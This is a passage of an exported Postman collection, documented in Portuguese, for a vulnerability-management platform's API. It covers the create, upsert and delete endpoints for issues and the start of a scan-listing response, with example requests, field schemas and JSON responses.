\"base_status\": \"OPEN\",\n    \"data_breach\": {}\n}"},{"id":"1f6f0ab0-8a25-4311-90b4-ac50de0c1021","name":"Severidade faltando","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"asset_id\": \"6283c8e00d855679726d4f83\",\n    \"responsible_id\": \"627e75840d855616e1399729\",\n    \"title\": \"Definir a Gestão dos Ativos de Informação\",\n    \"vulnerability\": {\n        \"host\": {\n            \"protocol\": \"tcp\",\n            \"port\": 25565\n        },\n        \"confidentiality\": \"NONE\",\n        \"integrity\": \"NA\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"error\": \"Malformed request body\",\n    \"error_key\": \"error.null.params\",\n    \"message\": \"Malformed request body\"\n}"},{"id":"51b0fb31-9983-428c-a566-4103cbede788","name":"Asset ID Faltando","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"title\": \"Cross-Site Scripting Stored\",\n    \"responsible_id\": \"627e75840d855616e1399729\",\n    \"severity\": 2,\n    \"vulnerability\": {\n        \"host\": {\n            \"protocol\": \"tcp\",\n            \"port\": 25565\n        },\n        \"confidentiality\": \"NONE\",\n        \"integrity\": \"NA\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"error\": \"Asset is required.\",\n    \"error_key\": \"error.null.params\",\n    \"message\": \"Asset is required.\"\n}"}],"_postman_id":"42baf5e8-102e-44a8-a7ac-344daade66d7"},{"name":"Upsert (Creates or updates an Issue)","id":"82d7047b-7e87-4777-9bc2-dea3f587bd37","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"formdata","formdata":[{"key":"kb_id","value":"String","type":"text","description":"<p>[Optional] ID de KB Vulnerability. Se for enviado, todas as informações de KB serão usadas para criar o Apontamento. Você pode sobrescrever as informações.</p>\n"},{"key":"source","value":"String","description":"<p>\"MANUAL\", \"NESSUS\", \"ACUNETIX\", \"ARACHNI\", \"QUALYS\", \"CUSTOM_PARSER\", \"NESSUS_AUDIT\", \"TENABLEIO\", \"NEXPOSE\", \"OPENVAS\", \"FORTIFY\", \"LUCY\", \"BURP\", \"APPSCAN\", \"NETSPAKER\", \"NIKTO\", \"WEBINSPECT\", \"W3AF\", \"LEGACY\", \"NMAP\", \"HIBP\", \"GAT\", \"GATAPI\", \"PHISHX\", \"GOPHISH\", \"IBLISS\", \"GAT_DISCOVERY\", \"GAT_SCAN\", \"ALIENVAULT\"</p>\n","type":"text"},{"key":"asset_id","value":"String","type":"text","description":"<p>[Required type = VULNERABILITY ou se for criar um novo Apontamento] ID do ativo relacionado ao Apontamento</p>\n"},{"key":"title","value":"String","type":"text","description":"<p>[Required se \"kb_id\" não existir] Título do apontamento</p>\n"},{"key":"description","value":"String","type":"text","description":"<p>Descrição do apontamento</p>\n"},{"key":"severity","value":"Integer","type":"text","description":"<p>[Required se \"kb_id\" não existir] Inteiro de 0 até 4. Padrão é 0</p>\n"},{"key":"type","value":"String","description":"<p>[Required] \"VULNERABILITY\", \"CONTROL\", \"BASELINE\", \"DATA_BREACH\", \"PHISHING\", \"INCIDENT\"</p>\n","type":"text"},{"key":"tags","value":"List<String>","type":"text","description":"<p>Lista de Tags.</p>\n"},{"key":"frameworks","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Frameworks.</p>\n"},{"key":"frameworks.name","value":"List<String>","type":"text","description":"<p>Lista de Nomes.</p>\n"},{"key":"frameworks.items","value":"List<String>","type":"text","description":"<p>Lista de Itens.</p>\n"},{"key":"score","value":"Float","type":"text","description":"<p>Pontuação.</p>\n"},{"key":"recommendation_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Recomendações.</p>\n"},{"key":"mitigation_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Mitigações.</p>\n"},{"key":"test_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Testes.</p>\n"},{"key":"category_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Categorias.</p>\n"},{"key":"root_cause_id","value":"String","type":"text","description":"<p>ID de Causa Raíz.</p>\n"},{"key":"creation_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"due_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"responsible_id","value":"String","type":"text","description":"<p>ID de Responsável.</p>\n"},{"key":"watcher_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Watchers.</p>\n"},{"key":"references","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Referências.</p>\n"},{"key":"references.url","value":"String","type":"text","description":"<p>URL de Referência.</p>\n"},{"key":"references.title","value":"String","type":"text","description":"<p>Título de Referência.</p>\n"},{"key":"comment","value":"String","type":"text","description":"<p>Comentário.</p>\n"},{"key":"links","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Links.</p>\n"},{"key":"link.linked_issue_id","value":"String","type":"text","description":"<p>ID do Apontamento Ligado.</p>\n"},{"key":"link.link_type","value":"String","type":"text","description":"<p>\"CAUSES\", \"IS_CAUSED_BY\", \"RELATES_TO\", \"DUPLICATES\", \"IS_DUPLICATED_BY\", \"BLOCKS\", \"IS_BLOCKED_BY\".</p>\n"},{"key":"project_ids","value":"List<String>","type":"text","description":"<p>Lista de IDs de Projetos.</p>\n"},{"key":"base_stauts","value":"String","type":"text","description":"<p>\"OPEN\", \"CLOSE\", \"NONE\".</p>\n"},{"key":"service_desks","value":"List<Object>","type":"text","description":"<p>Lista de Objetos de Service Desks.</p>\n"},{"key":"service_desks.service_desk_tool","value":"String","type":"text","description":"<p>\"JIRA\".</p>\n"},{"key":"service_desks.ticket_key","value":"String","type":"text","description":"<p>Chaves de Tickets.</p>\n"},{"key":"service_desks.url","value":"String","type":"text","description":"<p>URL.</p>\n"},{"key":"vulnerability","value":"Object","type":"text","description":"<p>[Required se o tipo do Ativo for HOST ou APPLICATION, ou se for realizar um Update de um Apontamento] Objeto de Vulnerabilidade.</p>\n"},{"key":"vulnerability.status","value":"String","type":"text","description":"<p>\"NONEXISTENT\", \"NOT_EXECUTED\", \"FIXED\", \"ACCEPT\", \"RETEST\", \"TREATMENT\", \"REOPENED\", \"PENDING\".</p>\n"},{"key":"vulnerability.impact","value":"Float","type":"text","description":"<p>Impacto da vulnerabilidade.</p>\n"},{"key":"vulnerability.probability","value":"Float","type":"text","description":"<p>Valor da probabilidade da vulnerabilidade.</p>\n"},{"key":"vulnerability.confidentiality","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.integrit","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.availability","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.attack_vector","value":"String","type":"text","description":"<p>\"NA\", \"PHYSICAL_ACCESS\", \"LOCAL_ACCESS\", \"ADJACENT_NETWORK\", \"LOCAL_NETWORK\".</p>\n"},{"key":"vulnerability.attack_complexity","value":"String","type":"text","description":"<p>\"NA\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.privileges_required","value":"String","type":"text","description":"<p>\"NA\", \"NONE\", \"LOW\", \"HIGH\".</p>\n"},{"key":"vulnerability.user_interaction","value":"String","type":"text","description":"<p>\"NONE\", \"REQUIRED\".</p>\n"},{"key":"vulnerability.cvss_score","value":"Float","type":"text","description":"<p>Pontuação Cvss.</p>\n"},{"key":"vulnerability.cves","value":"List<String>","type":"text","description":"<p>Lista de CVEs.</p>\n"},{"key":"vulnerability.cwes","value":"List<String>","type":"text","description":"<p>Lista de CWEs.</p>\n"},{"key":"vulnerability.exploits","value":"List<Object>","type":"text","description":"<p>Lista de Objetos de Exploits.</p>\n"},{"key":"vulnerability.exploits.name","value":"String","type":"text","description":"<p>Nome do Exploit.</p>\n"},{"key":"vulnerability.exploits.date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"vulnerability.exploits.verified","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o exploit já foi verificado.</p>\n"},{"key":"vulnerability.exploits.url","value":"String","type":"text","description":"<p>URL do exploit.</p>\n"},{"key":"vulnerability.zero_day","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o exploit já foi verificado.</p>\n"},{"key":"vulnerability.products","value":"List<Objects>","type":"text","description":"<p>Lista de Objeto de Produtos.</p>\n"},{"key":"vulnerability.products.vendor","value":"String","type":"text","description":"<p>Nome do Fornecedor.</p>\n"},{"key":"vulnerability.products.name","value":"String","type":"text","description":"<p>Nome do Produto.</p>\n"},{"key":"vulnerability.products.version","value":"String","type":"text","description":"<p>Versão do Produto.</p>\n"},{"key":"vulnerability.patch_available","value":"List<Object>","type":"text","description":"<p>Lista de Objeto de Patch Available.</p>\n"},{"key":"vulnerability.patch_available.name","value":"String","type":"text","description":"<p>Nome do Patch disponível.</p>\n"},{"key":"vulnerability.patch_available.apply_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"vulnerability.patch_available.applied","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o patch já foi aplicado,</p>\n"},{"key":"vulnerability.patch_available.release_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"vulnerability.host","value":"Object","type":"text","description":"<p>[Required se asset Type = HOST] Objeto de Host.</p>\n"},{"key":"vulnerability.host.port","value":"Integer","type":"text","description":"<p>Porta do host.</p>\n"},{"key":"vulnerability.host.protocol","value":"String","type":"text","description":"<p>Protocolo do host.</p>\n"},{"key":"vulnerability.host.service","value":"String","type":"text","description":"<p>Serviço do host.</p>\n"},{"key":"vulnerability.app","value":"Object","type":"text","description":"<p>[Required se asset Type = APPLICATION] Objeto de App.</p>\n"},{"key":"vulnerability.app.httpMethod","value":"String","type":"text","description":"<p>[Required se asset Type = APPLICATION] \"GET\", \"HEAD\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\", \"OPTIONS\", \"TRACE\", \"NA\", \"NE\".</p>\n"},{"key":"vulnerability.app.path","value":"String","type":"text","description":"<p>[Required se asset Type = APPLICATION] Path do App.</p>\n"},{"key":"vulnerability.app.parameter","value":"String","type":"text","description":"<p>[Required se asset Type = APPLICATION] Parâmetro do App.</p>\n"},{"key":"vulnerability.app.request","value":"Object","type":"text","description":"<p>Objeto de Request.</p>\n"},{"key":"vulnerability.app.requests.request_body","value":"String","type":"text","description":"<p>Body do Request.</p>\n"},{"key":"vulnerability.app.requests.request_header","value":"String","type":"text","description":"<p>Header do Request.</p>\n"},{"key":"vulnerability.app.requests.response_body","value":"String","type":"text","description":"<p>Body do Response.</p>\n"},{"key":"vulnerability.app.requests.response_header","value":"String","type":"text","description":"<p>Header do Response.</p>\n"},{"key":"vulnerability.exploit_available","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se há exploits disponíveis.</p>\n"},{"key":"control","value":"Objetct","type":"text","description":"<p>Objeto de Controle.</p>\n"},{"key":"control.status","value":"String","type":"text","description":"<p>\"IMPLEMENTED\", \"NOT_IMPLEMENTED\", \"NOT_SURE\", \"NOT_APPLICABLE\".</p>\n"},{"key":"control.approved","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o Controle foi Aprovado.</p>\n"},{"key":"baseline","value":"String","type":"text","description":"<p>Objeto de Baseline.</p>\n"},{"key":"baseline.audit_name","value":"String","type":"text","description":"<p>Audit Name.</p>\n"},{"key":"baseline.check_id","value":"String","type":"text","description":"<p>Check ID.</p>\n"},{"key":"baseline.check_value","value":"String","type":"text","description":"<p>Valor de Check.</p>\n"},{"key":"baseline.status","value":"String","type":"text","description":"<p>\"PASSED\", \"ERROR\", \"FAILED\", \"WARNING\".</p>\n"},{"key":"baseline.audit_file","value":"String","type":"text","description":"<p>Audit File.</p>\n"},{"key":"baseline.check_info","value":"String","type":"text","description":"<p>Informações de Check.</p>\n"},{"key":"data_breach","value":"Object","type":"text","description":"<p>Objeto de Violação de Dados.</p>\n"},{"key":"data_breach.domain","value":"String","type":"text","description":"<p>Dominios.</p>\n"},{"key":"data_breach.paste_url","value":"String","type":"text","description":"<p>URLs.</p>\n"},{"key":"data_breach.breach_date","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"data_breach.verified","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se violação de dados foi verificada.</p>\n"},{"key":"data_breach.breached_accounts","value":"Integer","type":"text","description":"<p>Número de Contas Violadas.</p>\n"},{"key":"data_breach.breach_name","value":"String","type":"text","description":"<p>Nome da violação.</p>\n"},{"key":"phishing","value":"Object","type":"text","description":"<p>Objeto de Phishing.</p>\n"},{"key":"phishing.status","value":"String","type":"text","description":"<p>\"PHISHED\", \"PARTIALLY_PHISED\", \"NOT_PHISHED\", \"NOT_REACHED\", \"AWARE\".</p>\n"},{"key":"phishing.viewed","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o Phishing foi visualizado.</p>\n"},{"key":"phishing.clicked","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o Phishing foi clicado.</p>\n"},{"key":"phishing.downloaded","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o Phishing foi baixado.</p>\n"},{"key":"phishing.executed","value":"Boolean","type":"text","description":"<p>Valor Booleano. Indica se o Phishing foi execuado.</p>\n"},{"key":"phishing.viewed_at","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"phishing.clicked_at","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"phishing.downloaded_at","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"phishing.executed_at","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"phishing.campaign_name","value":"String","type":"text","description":"<p>Campaign Names.</p>\n"},{"key":"phishing.programs","value":"Object","type":"text","description":"<p>Objeto de Programas.</p>\n"},{"key":"phishing.programs.name","value":"String","type":"text","description":"<p>Nome  do Programa.</p>\n"},{"key":"phishing.programs.location","value":"String","type":"text","description":"<p>Localização.</p>\n"},{"key":"phishing.programs.completionDate","value":"String","type":"text","description":"<p>Data no formato: \"AAAA-MM-DDThh:mm:ss\".</p>\n"},{"key":"phishing.programs.minimumScore","value":"Float","type":"text","description":"<p>Pontuação Mínima.</p>\n"},{"key":"phishing.programs.actualScore","value":"Float","type":"text","description":"<p>Pontuação.</p>\n"},{"key":"risk_id","value":"String","type":"text","description":"<p>Risk ID.</p>\n"}]},"url":"https://<instance>/api/v2/issues/upsert","description":"<p>Este endpoint permite que você crie novos Apontamentos.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","issues","upsert"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"e77fa7bc-8f57-442f-9d9c-9261139669da","name":"Criando Novo Apontamento","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"title\": \"Unsupported Version Detection\",\n    \"severity\": 3,\n    \"asset_id\": \"628e20270d85562ab0323b01\",\n    \"type\": \"VULNERABILITY\",\n    \"vulnerability\": {\n        \"host\": {\n            \"port\": 25565\n        }\n    }\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues/upsert"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"Unsupported Version Detection\",\n    \"severity\": 3,\n    \"type\": \"VULNERABILITY\",\n    \"vulnerability\": {\n        \"status\": \"PENDING\",\n        \"confidentiality\": \"LOW\",\n        \"integrity\": \"LOW\",\n        \"impact\": 3.37,\n        \"probability\": 3.89,\n        \"host\": {\n            \"port\": 25565,\n            \"protocol\": \"tcp\"\n        },\n        \"app\": {},\n        \"attack_vector\": \"LOCAL_NETWORK\",\n        \"attack_complexity\": \"LOW\"\n    },\n    \"control\": {},\n    \"baseline\": {},\n    \"phishing\": {},\n    \"issue_id\": \"628e21ad0d85562b8ef56315\",\n    \"kb_id\": \"628e21ac0d85562b2393dcd8\",\n    \"asset_id\": \"628e20270d85562ab0323b01\",\n    \"id_gat_detail\": 2685,\n    \"root_cause_id\": \"62826a4d0d855616ae6aa21d\",\n    \"creation_date\": \"2022-05-25T09:31:41\",\n    \"last_seen_date\": \"2022-05-25T09:31:41\",\n    \"source_scan\": \"GATAPI\",\n    \"base_status\": \"OPEN\",\n    \"data_breach\": {}\n}"},{"id":"790641c7-fa1e-4a43-a8fd-cd388115aab2","name":"Atualizando Apontamento já existente","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{   \n    \"title\": \"Unix Operating System Unsupported Version Detection\",\n    \"severity\": 3,\n    \"asset_id\": \"6283c8e00d855679726d4f83\",\n    \"type\": \"VULNERABILITY\",\n    \"vulnerability\": {\n        \"status\": \"FIXED\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues/upsert"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"language\": \"en\",\n    \"title\": \"Unix Operating System Unsupported Version Detection\",\n    \"severity\": 3,\n    \"type\": \"VULNERABILITY\",\n    \"vulnerability\": {\n        \"status\": \"FIXED\",\n        \"host\": {\n            \"protocol\": \"tcp\"\n        },\n        \"app\": {},\n        \"cvss_score\": 9.7,\n        \"exploit_available\": true\n    },\n    \"control\": {},\n    \"baseline\": {},\n    \"phishing\": {},\n    \"issue_id\": \"6287d0d90d85563c65db1598\",\n    \"kb_id\": \"6287d0d90d85563be60f5b86\",\n    \"asset_id\": \"6283c8e00d855679726d4f83\",\n    \"id_gat_detail\": 2685,\n    \"root_cause_id\": \"62826a4d0d855616ae6aa21d\",\n    \"creation_date\": \"2022-05-20T14:33:13\",\n    \"last_seen_date\": \"2022-05-20T14:33:13\",\n    \"update_date\": \"2022-05-25T09:39:11\",\n    \"responsible_id\": \"5a6b261ee3396a1c61f2c4d4\",\n    \"watcher_ids\": [\n        \"5a6b261ee3396a1c61f2c4d4\"\n    ],\n    \"source_scan\": \"GATAPI\",\n    \"base_status\": \"OPEN\",\n    \"data_breach\": {}\n}"},{"id":"cb124e19-04e5-4103-b0e1-014096db5056","name":"Request Incorreto","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer d3f8666c-a6af-4a94-98b9-f15000000000","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"title\": \"Unix Operating System Unsupported Version Detection\",\n    \"severity\": 3,\n    \"asset_id\": \"6283c8e00d855679726d4f83\",\n    \"type\": \"VULNERABILITY\"\n}\n","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues/upsert"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"error\": \"Malformed request body\",\n    \"error_key\": \"error.null.params\",\n    \"message\": \"Malformed request body\"\n}"}],"_postman_id":"82d7047b-7e87-4777-9bc2-dea3f587bd37"},{"name":"Delete Give Issues","id":"ee0b6463-94cb-4215-97a6-f505fb0f5131","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer d3f8666c-a6af-4a94-98b9-f15000000000","type":"text"}],"body":{"mode":"formdata","formdata":[{"key":"id","value":"List<String>","description":"<p>IDs dos apontamentos que deseja deletar</p>\n","type":"text"}]},"url":"https://<instance>/api/v2/issues","description":"<p>Este endpoint permite que você delete um ou mais Apontamentos.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","name":"Apontamentos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","issues"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"0a66f4d2-d50d-485a-849c-eb6150beddb3","name":"Deletar apontamento","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"id\": [\n        \"6286622d0d85567d259ed404\",\n        \"628661f90d85567d259dbac1\"\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"deleted\": 2,\n    \"deleted_ids\": [\n        \"6286622d0d85567d259ed404\",\n        \"628661f90d85567d259dbac1\"\n    ],\n    \"not_deleted\": 0\n}"},{"id":"648a0754-a930-4170-846f-27c03392a16b","name":"IDs Inválidos","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"id\": [\n        \"6286622d0d85567d259ed404\",\n        \"628661f90d85567d259dbac1\"\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":""},{"id":"1754f9a0-da4a-446d-8b6d-e58d8a097524","name":"Malformed Request Body","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"id\": \"6286622d0d85567d259ed404\"\n}","options":{"raw":{"language":"json"}}},"url":"https://instance/api/v2/issues"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"error\": \"Malformed request body\"\n}"}],"_postman_id":"ee0b6463-94cb-4215-97a6-f505fb0f5131"}],"id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"id":"477fb552-effd-440f-8b67-b7d960e59083","type":"text/javascript","exec":[""]}},{"listen":"test","script":{"id":"8bd3edb6-74cd-4b9c-a966-65c609e1d56e","type":"text/javascript","exec":[""]}}],"_postman_id":"21f1854e-f325-4bba-bcb3-74e5c0c3ab90","description":""},{"name":"Scan","item":[{"name":"Scans","id":"76a5ba11-b820-4451-9698-83947c7339f7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"noauth","isInherited":false},"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer d3f8666c-a6af-4a94-98b9-f15cefd7720f","description":"<p>Your API Key.</p>\n","type":"text"}],"url":"https://<instance>/api/v2/scan","urlObject":{"protocol":"https","path":["api","v2","scan"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"8d2c1598-2035-40e7-a3cd-4ce47a66e3f4","name":"Scans","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Bearer d3f8666c-a6af-4a94-98b9-f15cefd7720f","description":"Your API Key.","type":"text"}],"url":"https://<instance>/api/v2/scan"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","description":"","type":"text"}],"cookie":[],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"type\": \"NESSUS\",\n            \"filename\": \"54_233_243_48_-_ativacao_-_teste_nod7zs.nessus\",\n            \"results\": {\n                \"assets_in_scan\": 1,\n                \"assets_analized\": 0,\n                \"new_assets\": 15,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 1,\n                \"issues_in_scan\": 15,\n                \"issues_analized\": 0,\n                \"new_issues\": 15,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 0\n            },\n            \"scan_id\": \"654bc56257ba9e123771e39e\",\n            \"sub_type\": \"NESSUS_WEB\",\n            \"creation_date\": \"2023-11-08T03:29:06\",\n            \"execution_date\": \"2023-11-08T03:29:06\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"TYPE WEB V2.csv\",\n            \"results\": {\n                \"assets_in_scan\": 1,\n                \"assets_analized\": 0,\n                \"new_assets\": 0,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 1,\n                \"issues_in_scan\": 1,\n                \"issues_analized\": 0,\n                \"new_issues\": 0,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 0\n            },\n            \"scan_id\": \"64d690a357ba9e4a85a460ca\",\n            \"sub_type\": \"WEB\",\n            \"creation_date\": \"2023-08-11T08:48:51\",\n            \"execution_date\": \"2023-08-11T08:48:51\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"ATIVOS WEB COM APONTAMENTOS.csv\",\n            \"scan_id\": \"64d6906057ba9e4a85a460c0\",\n            \"sub_type\": \"WEB\",\n            \"creation_date\": 